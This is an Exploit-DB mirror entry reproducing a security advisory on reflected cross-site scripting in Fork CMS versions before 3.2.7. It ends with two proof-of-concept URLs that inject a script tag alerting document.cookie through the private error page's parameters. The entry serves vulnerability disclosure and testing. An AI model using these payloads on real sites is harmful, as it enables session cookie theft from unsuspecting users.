exploit-db-mirror/platforms/php/webapps/36894.txt
Offensive Security 0df2ff7351 DB: 2015-05-05
15 new exploits
2015-05-05 05:03:01 +00:00

11 lines
No EOL
773 B
Text
Executable file

source: http://www.securityfocus.com/bid/52236/info
Fork CMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Fork CMS versions prior to 3.2.7 are vulnerable.
http://www.example.com/private/en/error?type=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/private/en/error?type=action-not-allowed&querystring=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E.1